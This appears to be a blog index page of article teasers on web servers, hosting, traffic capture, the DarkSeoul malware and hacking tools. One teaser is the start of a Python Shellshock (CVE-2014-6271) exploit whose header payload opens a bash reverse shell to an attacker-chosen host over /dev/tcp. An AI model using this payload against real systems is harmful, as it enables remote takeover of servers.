Easy hacker guide

First and foremost, it is important for you to understand that ‘hacking’ is a broad term. There are many aspects to it, most of which require several programming skills, but that shouldn’t stop you from using the tools made available by the internet for you to take advantage of. Go to the HTMLdog website and learn some HTML first, it …

Build a LAMP Server on Ubuntu 14.04 Desktop

This video tutorial will show how to turn an Ubuntu 14.04 desktop into a LAMP server. Watch as I install Apache, MySql, and phpMyAdmin to have a test server for building web pages. I also install VSFTP for a FTP server. Finally, I install Webmin for a web interface and even set up a WordPress to use locally.

South Korean Malware Attack

  Executive Summary Reporting and technical details surrounding the malware used in the March 20, 2013, attack on South Korean assets have been varied and inconsistent. However, there are some commonalitie reported across multiple organizations that provide some level of insight into the malware, dubbed DarkSeoul. The common attributes of the attack campaign are the following: •The malicious file wipes …

Choosing a Hosting Environment – Linux vs Windows

Choosing a hosting environment is one of the first decisions when selecting a Web hosting package. Although you may already have a preference, consider these key differences when creating a new Web project for yourself or a client. When embarking on a new Web project, one of the first decisions to make is regarding the Web hosting platform. Both Linux …

Getting the Local Traffic Report

It can be problematic and lead to headaches – and possibly even hair loss (your follicles may vary) – if you need to capture local network traffic (sent to your own device or PC) as many tools (even the venerable WireShark) aren’t very helpful with that scenario. However, there is a way to do it using two free tools, namely …

Check vulnerable reverse shell CGI (shellshock)

# #CVE-2014-6271 cgi-bin reverse shell # import httplib,urllib,sys if (len(sys.argv)<4):         print “Usage: %s <host> <vulnerable CGI> <attackhost/IP>” % sys.argv[0]         print “Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080” % sys.argv[0]         exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell=“() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1” % sys.argv[3] headers = {“Content-type”: “application/x-www-form-urlencoded”,         …

WinForms small HTML server

Recently teaching, use Apache and IIS frequently. Idle boring, want to write my own small servers. The Internet to find information for a long time, and finally success. The effect is as follows: test-my-ower-server Because only handle simple requests,…

Web server attack tools

Some of the common web server attack tools include; Metasploit– this is an open source tool for developing, testing and using exploit code. It can be used to discover vulnerabilities in web servers and write exploits that can be used to compromise the server. MPack– this is a web exploitation tool. It was written in PHP and is backed by …

Use Virtualbox to Host Your Own Site, Mirror Your Tumblr or WordPress

  Wwhy not roll your own server at home, and then use it as a dashboard to manage and re-post to sites like Tumblr and WordPress? All you need is Virtualbox. Maymay shows us how it’s done. Maymay’s setup is brilliant in its simplicity. Ultimately, there’s very little a web host is doing aside from running software that you can …